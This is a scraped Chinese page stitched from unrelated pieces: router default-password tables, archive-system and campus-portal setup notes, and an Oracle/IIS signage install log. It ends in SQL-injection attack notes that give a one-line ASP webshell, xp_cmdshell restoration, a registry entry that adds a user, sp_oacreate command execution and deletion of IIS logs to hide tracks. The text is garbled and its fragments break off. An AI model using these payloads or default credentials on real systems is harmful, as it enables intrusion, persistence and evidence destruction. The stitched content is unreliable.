【www.guakaob.com--网络工程师】
http192.168.1.1路由器设置问题大全(含http192.168.0.1)
初学者一定对看到192.168.1.1或192.168.0.1这很想知道,这样理解192.168..这一类型的都是内网地址。
常用于内部局域网,是Internet的保留地址, 用于内部私有网络
所谓内网地址是在局域网中使用的IP地址 .专业术语就是我们说的 A类地址 内部地址,非标准的。有关网关的定义192.168.1.1是数据超出本网段去的第一站.
192.168.1.1或192.168.0.1只是局域网的一个IP(内部地址,网络中保留的地址),对于因特网还有一个唯一的IP于之对应.别混淆了.
工作局域网中可使用的IP有5类:
1.10.x.x.x
2.172.x.x.x
3.192.x.x.x
4.224.x.x.x
5.240.x.x.x
X可随意设置,范围1-254这5类地址是局域网专用保留地址,是不允许在互联网上出现的.
说到这里应该有个初步的了解了吧,这个一般是路由器的web管理网址。账号和密码根据路由器的品牌不同而不同。有admin admin
admin (空)root 123456等!
下面举出有关常用的192.168.1.1或192.168.0.1 路由默认的admin和password
艾玛 701g 192.168.101.1 192.168.0.1 用户名:admin 密码:admin 用户名:SZIM 密码:SZIM 艾玛701H 192.168.1.1 10.0.0.2 用户名:admin 密码:epicrouter
实达2110EH ROUTER 192.168.10.1 用户名:user 密码:password 用户名:root 密码:grouter 神州数码华硕: 用户名:adsl 密码:adsl1234 全向: 用户名:root 密码:root 普天: 用户名:admin 密码:dare
e-tek 用户名admin 密码12345
zyxel 用户名anonymous 密码1234
北电 用户名anonymous 密码12345
大恒 用户名:admin 密码:admin
大唐 用户名:admin 密码:1234
斯威特 用户名:root 密码:root 用户名:user 密码:user
中兴 用户名:adsl 密码:adsl831
1、全向QL1680 IP地址10.0.0.2,用户名:admin,密码:qxcomm1680, 管理员密码:qxcommsupport。 全向QL1880 IP地址192.168.1.1,用户名:root,密码:root 全向QL1688 IP地址10.0.0.2,用户名为admin;密码为qxcomm1688
2、TP-LINK TD-8800在IE输入192.168.1.1,户名admin,密码admin
3、合勤zyxel 642 在运行输入telnet 192.168.1.1 密码1234
4、Ecom ED-802EG 在IE输入192.168.1.1,用户名和密码都为root
5、神州数码6010RA,在IE输入192.168.1.1 用户名为ADSL,密码为ADSL1234
6、华为SmartAX MT800的初始IP是192.168.1.1,用户名和密码都为ADMIN,恢复默认配置的方法有两种,一种是连续按MODEM背后的RESET键三次,另一种是在配置菜单的SAVE&REBOOT里选择恢复默认配置。
7、伊泰克:IP:192.168.1.1 用户名:supervisor 密码:12345
8、华硕IP:192.168.1.1 用户名:adsl 密码:adsl1234
9、阿尔卡特 192.168.1.1 一般没有密码
10、同维DSL699E 192.168.1.1 用户名:ROOT 密码:ROOT
11、大亚DB102 192.168.1.1 用户名:admin 密码:dare 高级设置192.168.1.1docindex1.htm
12、WST的RT1080 192.168.0.1 usernameroot passwordroot
13、WST的ART18CX 10.0.0.2 usernameadmin passwordconexant usernameuser passwordpassword
14、实达V3.2 root root V5.4 root grouter
15、泛德 admin conexant 16、东信Ea700 192.168.1.1用户名:空 密码:password
17、broadmax的hsa300a 192.168.0.1 usernamebroadmax passwordbroadmax
18、长虹ch-500E 192.168.1.1 usernameroot passwordroot
19、重庆普天CP ADSL03 192.168.1.1 usernameroot passwordroot
20、台湾突破EA110 RS23238400 192.168.7.1 usernameSL pswSL
21、etek-td的ADSL_T07L006.0 192.168.1.1 User Name supervisor Password 12345 忘记密码的解决办法: 使用超级终端的Xmodem方式重写Vxworks.dlf,密码恢复成:12345 22、GVC的DSL-802ER3A 10.0.0.2 usernameadmin passwordepicrouter usernameuser passwordpassword
23、科迈易通km300A-1 192.168.1.1 username passwordpassword 科迈易通km300A-G 192.168.1.1 usernameroot passwordroot 科迈易通km300A-A 192.168.1.1 usernameroot or admin password123456
24、sunrise的SR-DSL-AE 192.168.1.1 usernameadmin password0000 sunrise的DSL-802E_R3A 10.0.0.2 usernameadmin passwordepicrouter usernameuser passwordpassword 25、UTStar的ut-300R 192.168.1.1 usernameroot or admin passwordutstar 这些都是一些ADSL设奋的出厂时的默认初始IP,用户名和密码,是要调试这些设奋时必须要知道的东西。 一般调试这些设奋有三种方法,一种是最常见的WEB方法,就是在浏览器中填入设奋的IP,如QX1680,就是在浏览器地址栏输入10.0.0.2,出现提示栏后,输入用户名admin,密码qxcommsupport,就可以管理员设置界面了。最常见和最简单的就是这种方法。 第二种方法就是用TELNET的方法,telnet IP,如早期的合勤642,方法telnet 192.168.1.1,然后输入密码1234,就可以进入全英文的字符界面了。 第三种方法就是用厂商自带的配置程序来进入配置界面,如CyberLink 63076309KG 它使用在随Cybrlink 63076309KG带的光盘中DSLCom.exe, 出厂时默认值:路由IP地址 1 92.168.1.1密码 stm,由于这种方法没有前两种方法方便,所以现在的低端产品比较少采用了。 绝大部分产品的调试都是要先通过产品自带的双绞线连接设奋后,把本机网卡的IP设置成跟该设奋同一网段,再进行配置,如设奋被改了默认的IP或者密码,大部分都可以通过复位来恢复出厂默认值。最常用也是最有用的方法就是把设奋断电后,一直按住复位键,然后通电,持续一小段时间后就可以恢中达通CT-500 192.168.1.1 root12345
26.中兴adsl841默认IP:192.168.1.1,UserName:admin,Password:private 成都天逸 用
户名:admin 密码:epicrouter 上海中达 用户名:(随意) 密码:12345 各位用ADSL的朋友,在拿到ADSL猫后,应及时修改默认密码,以免被人所利用 ADSL MODEM初始地址及用户名密码大全 要调试这些设奋,要先把网卡的IP地址设置成跟这些ADSL设奋相同的网段
1、全向QL1680在IE浏览器的地址栏里面敲入IP地址10.0.0.2,的用户名是admin出厂时默认值:密码是qxcomm1680,管理员密码是 qxcommsupport
2、全向QL1880在IE浏览器的地址栏里面敲入IP地址192.168.1.1,的用户名是root出厂时默认值:密码是root
3、全向QL1688在IE浏览器的地址栏里面敲入IP地址10.0.0.2,用户名为admin;出厂时默认值:密码为qxcomm1688
4、CyberLink 63076309KG 它使用在随Cyberlink63076309KG带的光盘中DSLCom.exe, 出厂时默认值:路由IP地址 192.168.1.1密码 stm
5、TP-LINK TD-8800在IE输入192.168.1.1,户名admin,密码admin.
6、合勤zyxel 642 在运行输入telnet 192.168.1.1 密码1234,一直按住机身后面的的RESET复位键然后开机,保持几十秒就可以恢复出厂默认 值。
7、Ecom ED-802EG 在IE输入192.168.1.1,用户名和密码都为root
8、神州数码6010RA,在IE输入192.168.1.1 用户名为ADSL,密码为ADSL1234
9、华为SmartAX MT800的初始IP是192.168.1.1,用户名和密码都为ADMIN,恢复默认配置的方法有两种,一种是连续按MODEM背后的RESET键三 次,另一种是在配置菜单的SAVE&REBOOT里选择恢复默认配置。
伊泰克 http192.168.1.1 用户名:supervisor 密码:12345
华硕 http192.168.1.1 用户名:adsl 密码:adsl1234
阿尔卡特 http192.168.1.1 一般没有密码
同维DSL699E http192.168.1.1 用户名:ROOT 密码:ROOT
大亚DB102 http192.168.1.1 用户名:admin 密码:dare 高级设置界面:http192.168.1.1docindex1.htm WST的RT1080 http192.168.0.1 usernameroot passwordroot
WST的ART18CX http10.0.0.2 usernameadmin passwordconexant usernameuser password :assword
全向qxcomm1688 http192.168.1.1 高端设置密码是:qxcommsuport
全向qxcomm1680 http192.168.1.1 登陆ADSL的密码是qxcomm1680
实达 V3.2 root root V5.4 root grouter
泛德 admin conexant
东信Ea700 http192.168.1.1 用户名:空 密码:password
broadmax的hsa300a http192.168.0.1 usernamebroadmax passwordbroadmax
长虹ch-500E http192.168.1.1 usernameroot passwordroot
重庆普天CP ADSL03 http192.168.1.1 usernameroot passwordroot
台湾突破EA110 RS23238400 http192.168.7.1 username SL psw SL
etek-td的ADSL_T07L006.0 http192.168.1.1 User Name supervisor Password 12345 忘记密码的解决办法: 使用超级终端的Xmodem方式重写Vxworks.dlf,密码恢复成:12345
GVC的DSL-802ER3A http10.0.0.2 usernameadmin passwordepicrouter usernameuser password assword
科迈易通km300A-1 http192.168.1.1 username password assword
科迈易通km300A-G http192.168.1.1 usernameroot passwordroot
科迈易通km300A-A http192.168.1.1 usernameroot or admin password123456
sunrise的SR-DSL-AE http192.168.1.1 usernameadmin password0000
sunrise的DSL-802E_R3A http10.0.0.2 usernameadmin passwordepicrouter usernameuser password assword
UTStar的ut-300R http192.168.1.1 usernameroot or admin passwordutstar
这些都是一些ADSL设奋的出厂时的默认初始IP,用户名和密码,是要调试这些设奋时必须要知道的东西
一般调试这些设奋有三种方法,一种是最常见的WEB方法,就是在浏览器中填入设奋的IP,如QX1680,就是在 浏览器地址栏输入10.0.0.2,出现提示栏后,输入用户名admin,密码qxcommsupport,就可以管理员设置界面了。最常见和最简单的就是这种方法。
第二种方法就是用TELNET的方法,telnet IP,如早期的合勤642,方法telnet 192.168.1.1,然后输入密码1234,就可以进入全英文的字符界面了。
第三种方法就是用厂商自带的配置程序来进入配置界面,如CyberLink 63076309KG 它使用在随Cybrlink 63076309KG带的光盘中DSLCom.exe, 出厂时默认值:路由IP地址 1 92.168.1.1密码 stm,由于这种方法没有前两种方法方便,所以现在的低端产品比较少采用了。
绝大部分产品的调试都是要先通过产品自带的双绞线连接设奋后,把本机网卡的IP设置成跟该设奋同一网段,再进行配置,如设奋被改了默认的IP或者密码,大部分都可以通过复位来恢复出厂默认值。最常用也是最有用的方法就是把设奋断电后,一直按住复位键,然后通电,持续一小段时间后就可以恢复出厂默认值了
开投公司档案管理系统网络版登录和档案查询步骤
1. 打开链接
用 户 名:
管理密码:
验 证 码:【http://192.168.01/login.asp】
2. 输入“用户名”、“管理密码”和“验证码”登录系统。 “用户名”可用老员工的,“管理密码”为123,“验证码”为给出的验证码。登录后会出现下列对话框:
题名:
责任者:
文号:
日期:
存放位置:
保管期限:【http://192.168.01/login.asp】
分类代码:
3. 查询某份资料时,在上述对话框中输入该文件的标题(关键词)、或责任者或文号。例如,查询“青林庙外围苗木补种工程施工合同”时,在“题名”框中输入 “青林庙”、“补种”、“合同”等关键词,关键词之间用空格键开。
题名:
责任者:
文号:
日期:
存放位置:
保管期限:
分类代码:
4. 点击“查询信息”框,界面将显示被查询资料的“档号”、“文件号”、“日期”和“责任人”等信息。如,“青林庙外围苗木补种工程施工合同”的档号为“FXNY-6”、文件日期为“2012-11-6”、责任人为“杭州市开发投资有限公司”及“杭州开投市政园林有限公司”。可按档号在档案室查借阅该资料。
保管
档号
期限
文件
题名
字号
文件日期
责任者
档案类型
借阅状态
年度号
属性
杭州市开
青林庙外围苗木补种工
[2012]91
发投资有限公司、杭
2012-11-6
州开投市政园林有限公司
科技
程施工合同
号、浙新
(附:预算
FXNY-6
长期
工审字
档案
内部审核
[2013]359
表、竣工资
号
料、结算书、审计报告)
校园资源信息网管理系统安装及使用说明:
一、本系统主要功能:动态管理学校网页,主要有:学校简介(图片展示)、领导班子(相片显示)、校园新闻、图片新闻、规章制度、德育管理、教学管理、课件管理、试题管理、论文管理、教案管理和学生信息平台。授权用户可以发布校园信息和图片新闻立即在网页上浏览出来。一般用户可以上传和下载课件、试题、教案、论文和软件等等。学生信息平台由系统管理员授权用户管理。主要有学籍管理、成绩录入和统计(按学号、普通总分、标准分进行排序)、毕业生学籍管理和查询、学生德育考核和操行评语、学生奖励处分记录。设置动态查询功能,由用户自行设置三个查询条件进行精确查询和模糊查询。本系统数据文件全部存贮在数据库中,不受服务器读写权限的限制。保护了服务器的安全。本系统现在有四个版本的软件。
1、《SQL版》是指所有数据都存放在SQL的数据库。
2、《SQL版+中小学通用教务管理系统网络平台》是指学校文件、课件、试题等数据存放在SQL数据库中。学生学籍、成绩、评语、奖处等数据存放在《中小学通用教务管理系统》的数据库中,与《中小学通用教务管理系统》共享数据资源。
3、《ACCESS版》是指所有数据都存放在ACCESS桌面数据库中。
4、《ACCESS版+中小学通用教务管理系统网络平台》是指学校文件、课件、试题等数据存放在ACCESS桌面数据库中。学生学籍、成绩、评语、奖处等数据存放在《中小学通用教务管理系统》的数据库中,与《中小学通用教务管理系统》共享数据资源。
二、校园局域网服务器上(或本机作为因特网的服务器)安装本系统:
本操作平台安装在网站的服务器上。
(一)操作系统
Microsoft Windows Server 2003
Microsoft Windows NT 4.0(需要 Service Pack 6a)
Windows 2000 Server(推荐 Service Pack 3 或更高版本)
1、若服务器上使用Windows 2000 server操作系统,推荐 Service Pack 3 或更高版本,必须系统升级更新运行 W2ksp3.exe。可从微软公司网站下载此文件。
2、 若服务器上使用Windows NT 4.o操作系统,需要 Service Pack 6a,必须系统升级更新运行 Wntsp6a.exe。可从微软公司网站下载此文件。
(二)框架安装 微软公司网站下载或登陆勇科教育软件网站 下载框架文件包解压后,
1)、运行dotnetfx.exe 后再运行 lanpack.exe 。安装微软系统框架 Framework1.1
2)、运行 mdac_tpc.exe 安装ADO.NET数据访问组件。
(三)SQL版必须安装SQL Server 2000软件。ACCESE版安装微软office办公软件的ACCESE桌面数据库软件。
1) 安装SQL Server 2000 在服务器上安装 (1) 在校园局域网的服务器安
装 SQL Server 2000 中文版(软件用户自备)。(2) 运行“附加SQL数据库
程序.EXE,用户只要正确输入SQL的服务器名称、登陆的用户和密码就可以
附加数据库和新增用户的名称和密码。
2) 安装微软office办公软件的ACCESE桌面数据库(普通都安装有此软件)。
(四)、使用方法及设置
1、 建立网站的,如文件夹名称为“校园动态网页系统”。把系统文件复制在此文件夹内。
2、 本平台的主文件是 index.aspx 可在网站 Internet 设置此文件为启动文件。也可在其他主页中设置链接 index.aspx。注意链接应为网页形式,例如本服务器网站的ip地址为192.168.0.01 ,文件夹为“校园动态网页系统”, 本平台的所有文件在 “校园动态网页系统”下 ,则为
3、 系统第一次使用的系统管理员:admin 密码: admin 可以修改管理员的帐号和密码。
4、 局域网上运行校园信息网(ACCESE版)+中小学通用教务管理系统网络操作。需指向中小学通用教务管理系统的数据包。具体操作如下:设置中小学教务管理系统数据库的路径。在IE浏览器上 运行
1) 数据包在本机上如:D:\JWGK45\DATA45\ 数据包在网络上.。A) 先把数据库的文件夹 DATA45 的属性设置为共享完全。(B) 输入 \\共享计算机名\共享目录 如:\\教导处\DATA45\ 路径存盘即可
5、第一次运行SQL版的程序,务必运行“附加SQL数据库程序.EXE”,只要正确输入SQL的服务器名称、登陆的用户和密码就可以附加数据库和新增用户的名称和密码。本程序会把连接SQL数据库的信息存在你的目录中。否则运行程序不能运行,会出现如下错误信息:
“/”应用程序中的服务器错误。
--------------------------------------------------------------------------------
连接无法用于执行此操作。在此上下文中它可能已被关闭或无效。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.Runtime.InteropServices.COMException: 连接无法用于执行此操作。在此上下文中它可能已被关闭或无效。
源错误:
执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。
堆栈跟踪:
[COMException (0x800a0e7d): 连接无法用于执行此操作。在此上下文中它可能已被关闭或无效。]
ADODB.RecordsetClass.Open(Object Source, Object ActiveConnection, CursorTypeEnum CursorType, LockTypeEnum LockType, Int32 Options) +0
校园资源信息管理系统.LISTQSWEBVIEW.m(Object A_0, EventArgs A_1) +359
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +731
-------------------------------------------------------------------------------- 版本信息: Microsoft .NET Framework 版本:1.1.4322.573; ASP.NET 版本:1.1.4322.573
三、因特网虚拟主机上运行本系统
1、 运行ACCESE数据库版的系统。申请有支持运行ASP.NET和ACCESE数据库版的虚拟主机空间,用FTP上传软件,把本系统《校园信息资源网文件包》内的文件全部上传到你申请的虚拟主机文件夹内,注意要按你申请上传的要求去上传。虚拟主机的主文件一般为 index.htm,用户可用其他网页编辑工具修改此文件,关健要链接系统的index.aspx,才能运行本系统。ACCESE数据库版无须安装。
2、 运行SQL数据库版的系统。申请有支持运行ASP.NET和SQL_SERVER数据
库版的虚拟主机空间。具体上传方法与上述相同。但在虚拟主机上要附加SQL数
据库和录入登陆用户名、密码等才能运行SQL版的校园资源信息网。你可以申请你空间的网管人员帮助运行本系统的附加程序: “附加SQL数据库程序.EXE”,只要正确输入SQL的服务器名称、登陆的用户和密码就可以附加数据库和新增用户的名称和密码。本程序会把连接SQL数据库的信息存在你的目录中。
3、 系统第一次使用的系统管理员:admin 密码: admin 可以修改管理员的帐号和密码。
四、FALSH动画设置
用户可用FALSH软件工具制作FALSH动画替代IMGE 文件夹内的FALSH 文件 AJWFLASH.SWF 为自已本校的动画文件.。但文件名称必须为AJWFLASH.SWF
五、软件注册
本系统是共享软件,必须要正式注册才能长期使用,并得到长期的免费升级和技术指导。申请正式版有两条途径。
1、申请注册码,费用较低,价格800元。从邮局汇款收款后立即发送注册码 并且安装时建议安装在D盘下。若安装其他盘则读取C盘的号码对你以后的若C盘重新格式化,
系统的注册码不会变化。否则须重新获取注册码。
2、申请永久光盘版。价格较高,每个1000元。因为要邮寄费用。并且须告知单位名称,
独立生成打包文件,不需要注册码。
汇款方式: 1) 普汇三天时间 2)电子汇款二个小时即可
邮寄地址:广东省珠海市小林中学 宋德勇收 邮编:519045
电话:0756-7736897
珠海勇科软件有限公司
网址:
联系电话:0756-7736897
电子邮箱:
QQ: 455799600
地址:广东省珠海市金湾区小林和兴路45号小林中学内
邮编: 519045
2005年10月6日
一、BS安装
1. 安装Windows Sever 2003,安装WinRAR及Microsoft Office 2003
2. 改IP及终端名。
一层设置:192.168.27.12 255.255.255.0 192.168.27.254 DNS:192.168.30.1 /131-1c 二层设置:192.168.27.11 255.255.255.0 192.168.27.254 DNS:192..168.30.10 /131-2c 服务器:192.168.30.11 255.255.255.0 192.168.27.254 DNS:192.168.30.10 ·终端IP改完后,要远行ewfshutdoun.bat,并重启。
·服务器计算机名,改完后要重启再装datebass,不然会出错。
如果datebass要重装,必须删掉datebass,格式化D盘,并在注册表中删除orcl项。
3. 安装datebass。(以下是简易操作)
高级安装
企业版
D:\oracle\product\10.2.0\db_1
创建数据库 一般用途
数据库字符集: Unicode 标准 UIF-8
数据库名:orcl SID::orcl
不启用自动备份。
D:\oracle\product\10.2.0\oradate
不启用自动备份
所有帐户使用同一个口令:manage
弹出IE:
用户名:system口令:manage 点同意。
·如果此时有报错:java.lang.Exception: Number of responses does not match queries 一般此时报错,都是电脑时区问题。都按下面方法能解决。
找开D:\oracle\product\10.2.0\db_1\kong_orcl\sysman\config\ emd.properties
最后一行改成:agentTZRegion=Asia/Shanghai或GMT-8
4. 安装Client。(以下是简易操作)
管理员
D:\oracle\product\10.2.0\client_1
服务器名:orcl
选TCP 主机名:192.168.30.11(服务器IP)
是,测试 更改登录 system 口令 manage
网络服务器名:orcl
否,不配置另一个.net服务名 点完成
如果数据服务器和应用服务器不是同一台,此时服务器名应写:orcl_kong(kong为数据服务器计算机名)
5. 安装wisedisplaywab
在D盘新建文件夹:wisedisplay
将wisedisplayweb20100906解压到wisedisplay文件夹。(解压最新版web)
运行批处理文件,建立数据库表格。\initdatebass\createdatebass.bat
安装wisedisplay998控制室软件到D:\wisedisplay\cgi-bin
·运行批处理文件版本不对,在添加单位时会有报错:ODBC错误,“FUNCTIONS”标识符无效。 /manager/CompanyAddGate.asp,行170,
CreateTable.sql文件中错误:functiondo varchar(32) DEFAULT '',应为functions
6. 更改wisedisplay\global.asa文件
Application("mobileabshosturl")=”"
Application("connectString") = "DSN=wisedisplay;
PWD=wisedisplay" „„Source=orcl UID=wisedisplay;
·IP地址写错,则无法显示网页。
·DNS错误,则报错:ODBC错误,未发现数据源名称并且未指定默认驱动程序。
/LM/W3SVC/235046904/root/golbal.asa 行40
7. 更改wisedisplay\cgi-bin\cgi-dll.opt
<preparefilecgi>
<type>2</type> <dbfile></dbfile>
<dsnstr>orcl</dsnstr>
<uidstr>wisedisplay</uidstr>
<pwdstr>wisedisplay</pwdstr>
<fileroot>D:\wisedisplay</fileroot> ‘wisedisplay后面没有“\”
<servername>ORCL</servername>【http://192.168.01/login.asp】
<dominname></dominname>
</preparefilecgi>
·发布任务成功,但不往前端发,问题在于,fileroot后面地址错误,
无法在D:\wisedisplay\privatefiles\bs\filedist文件夹中生成SM_04文件夹。
8. 修改ODBC
管理工具——数据源ODBC——系统DNS
添加——Oracle in Oraclient10g_home1
DNS:wisedisplay
TNS service Name:ORCL
Use ID:wisedisplay
Test Connection——ORCL wisedisplay wisedisplay
9. 添加IIS服务
控制面板——添加或删除程序——添加/删除Windows 组件
应用程序服务器——Internet 信息服务(IIS)及启用网络 COM+ 访问
如果有提示查找文件,指向windows 2003的I386安装目录(SP1与SP2不能通用)
10. 新建IIS站点
管理——IIS——网站——删掉默认网站,新建网站
描述:多媒体信息发布系统
IP:192.168.30.11(应用服务器IP)
主目录:D:\wisedisplay
权限:读取 及 运行脚本ASP
11. 修改IIS站点属性
IIS:WEB扩展,六项全部选“允许”
站点——属性——主目录——配置——选项——ASP超时:1800秒
12. 修改3个文件夹的属性
Cgi-bin及Directory——纯脚本 改成 脚本和可执行文件 本地路径——读取 Privatefiles——纯脚本 改成 脚本和可执行文件 本地路径——读取 和 写入
13. 修改5个文件夹的权限
Company,。Directory 。Manager。Privatefiles。Sharefiles五个文件夹,
分别添加IUSER_kong及IIS_WPG的完全控制权限
14. 修改2个用户的权限
将IUSER_kong 和 IWAM_kong 两个用户设置隶属于Administrator
15. 修改控制端的文件接收设置
中控端软件——数据传输——文件传输
将接收目录D:\wisedisplay\displayfile 改为:D:\wisedisplay\sharefiles
·此目录未更改,将无法返回对终端设备的截图图象/
16.
17. 修改orcale net manager配置 制作网页跳转。 本地——服务命名——orcl——主机名:192.168.30.11(对应服务器IP)
将跳转网页index.htm和xt.swf复制到D:\wisedisplay\
用记事本打开index.htm,设置url=·此网页作用使操作员只须要输入服务器IP地址,即可登陆系统页面。
·如果甲方是将多媒体系统集成到OA网站上,可在其网站首页,添加上面地址。
二、BS调试
1. 调试控制端软件。
删除D:\wisedisplay\cgi-bin\manager文件夹
删除C:\WINDOWS\WiseDisplayServer.ini文件中Operator=administrator
重新打开控制端软件,可以登陆。
在新版本中,不用此操作,旧版本未执行本操作,将无法登陆,报数据错误。
2. 注册控制端软件。
因为服务器不能上网,所以必须离线注册。
帮助——系统注册——离线注册——复制本机信息码——粘贴到U盘的TXT文件。 到可以上网的电脑上,打开
输入序列号sanxiguangyuan000-wisepeak 口令 验证码。
点wisedisplayserver 将TXT文档中的信息码,粘贴到本机信息码中。
点获取注册码,将获取到的注册码,复制到TXT文档中,
将注册吗复制到离线注册页面中,输入序列号和口令,点离线注册。
不注册只能本地登陆,无法执行网络版,BS无法正常工作。
3. 新建BS单位。
打开
用户名administrator 密码 changeit
新建单位 th
4. 测试操作员添加,授权——OK
5. 测试终端引入、修改、截国——OK
6. 测试素材上传,修改——OK
7. 测试布局编辑、模板编辑——OK
8. 测试栏目、节目单的添加——OK
9. 测试栏目编排、节目编排——OK
10.
11.
12. 测试栏目分发、节目单分发——OK 测试临时节目单分发——OK 测试Flash播放
·从太航网站上下载的Flash,播放显示灰色无图像,播放其它Flash正常。 ·原Flash受保护,无法播放。更改其Flash名即可——OK
13. 测试MP4格式视频播放
·黑屏,用专用播放器蓝屏,最后使用NBplayer.exe——OK
·视频有,但无声。用耳机听有,更换莲花头转3.5的转接口——OK
14. 测试日志查询,导出
·导出日志时,报company\downlandtex.asp行61错,路径没找到。 ·在D:\wisedisplay\privatefiles\th下,新建一个output文件夹——OK
15. 测试远程重启,开机,关机——OK
16. 测试临时节目单启动,停止——OK
1、 用^转义字符来写ASP(一句话木马)文件的方法:
VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
? echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
2、 显示SQL系统版本:
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int. /display.asp,行17
3、 在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用―in‖关键字进行查询,例如―select * from mytable where id in(1)‖,括号中的值就是我们提交的数据,它的结果与使用―select * from mytable where id=1‖的查询结果完全相同。所以访问页面的时候在URL后面加上―) and 1=1 and 1 in(1‖后原来的SQL语句就变成了
―select * from mytable where id in(1) and 1=1 and 1 in(1)‖,这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为―包含数字型‖吧,聪明的你一定想到了还有―包含字符型‖呢。对了,它就是由于类似―select * from mytable where name in('firstsee')‖的查询语句造成的。
4、 判断xp_cmdshell扩展存储过程是否存在:
xtype = 'X' AND name = 'xp_cmdshell')
恢复xp_cmdshell扩展存储的命令:
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
5、 向启动组中写入命令行和执行程序:
TWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
6、 查看当前的数据库名称:
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp,行17
7、 列出当前所有的数据库名称:
select * from master.dbo.sysdatabases 列出所有列的记录
select name from master.dbo.sysdatabases 仅列出name列的记录
8、 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令: create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL) DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。 EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌 WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE
END
drop TABLE MYTMP ---------- DECLARE @shell INT DECLARE @fso INT DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE
END
以下是一行里面将WEB用户加到管理员组中: DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
以下是一行中执行EXE程序: DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
SQL下三种执行CMD命令的方法:
先删除7.18号日志:
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
